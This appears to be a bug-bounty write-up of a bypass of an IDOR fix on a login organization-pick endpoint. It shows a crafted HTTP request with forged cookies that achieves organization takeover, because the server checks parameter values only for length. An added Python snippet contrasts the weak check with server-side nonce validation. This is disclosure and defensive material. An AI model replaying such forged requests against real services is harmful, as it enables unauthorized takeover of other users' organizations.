After my previous IDOR report, the team pushed the fix and closed the report as resolved. Whenever a fix is pushed for one of my reported issues, I always want to see whether there is any bypass, or at least understand how the team implemented the fix.
I was checking the endpoint, and this time the impact is even worse than in the earlier reported issue: "An attacker can take over the organization of any user on the platform — without even needing the victim's session."
As a quick recap, the vulnerable request looked like this:
POST /internal/system/v1/auth/login/pick HTTP/2
Host: us.api.prod.example.com

In the previous report, the server read the organizationId and email address from the cookies, and if we swapped those for the victim's email address and organizationId we could obtain the session token of the victim user.
After the fix, a few things had changed. First, the cookie parameter example_orgpick_email_prod now carries the user's UUID (which can be obtained from the publicly published apps) instead of the email address. A new parameter, example_orgpick_nonce_prod, was introduced, and there was some validation against the XSRF token as well. After that I started playing with these values.
The modified request looks like this:
POST /internal/system/v1/auth/login/pick HTTP/2
Host: us.api.prod.example.com
Cookie: example_orgpick_email_prod=3fe7b0f0-b976-468e-a4e3-1e0855564010; example_orgpick_nonce_prod=1917137440; ruist_client_nonce_prod=1917137440; ruist_nonce_prod=1917137441
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Xsrf-Token: 7972cde779452320475599r097d43cacfad30bf4b52908da29ecb6d8f10a588
Origin: https://console.example.com
Content-Length: 57
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Sec-Gpc: 1
Te: trailers
{"organizationId":"b67342ec-6382-441d-8a35-cada6f85a4d7"}

After playing with these values, I found that the parameters are only checked for length, not for value, so you can pass anything of the same length and bypass the fix the team implemented. This leads to Organization Takeover.
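As an added example, not code from the original write-up or from the platform: the length-only check described above beside a check that binds the org pick to a server-issued, single-use nonce. Function and store names are hypothetical; the cookie names and UUIDs are the ones from the request above.

```python
import hmac
import secrets

# Constructed in-memory stand-in for the server's pending-login store:
# nonce -> the user it was issued to and the organizations that user may pick.
PENDING_PICKS = {}


def issue_pick(user_uuid, allowed_orgs):
    """Server side, at login: mint a 10-digit nonce bound to this user."""
    nonce = str(secrets.randbelow(10**10)).zfill(10)
    PENDING_PICKS[nonce] = {"user": user_uuid, "orgs": set(allowed_orgs)}
    return nonce


def weak_pick(cookies, body):
    """Length-only validation, as the write-up describes the first fix behaving.

    Any 36-character 'email' value and any 10-character nonce pass, so the
    organizationId in the body is accepted without being tied to anyone.
    """
    if len(cookies.get("example_orgpick_email_prod", "")) != 36:
        return None
    if len(cookies.get("example_orgpick_nonce_prod", "")) != 10:
        return None
    return body.get("organizationId")


def strong_pick(cookies, body):
    """Look the nonce up server-side and verify every value against it."""
    nonce = cookies.get("example_orgpick_nonce_prod", "")
    record = PENDING_PICKS.pop(nonce, None)  # single use: consume on first try
    if record is None:
        return None  # unknown, replayed or forged nonce
    user = cookies.get("example_orgpick_email_prod", "")
    if not hmac.compare_digest(user, record["user"]):
        return None  # cookie does not name the user the nonce was issued to
    org = body.get("organizationId", "")
    if org not in record["orgs"]:
        return None  # user is not a member of the requested organization
    return org
```

Logging the `None` outcomes of `strong_pick` with the offending nonce gives a direct detection signal for the forged-cookie pattern described above.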

Hope you have enjoyed this :)
Many thanks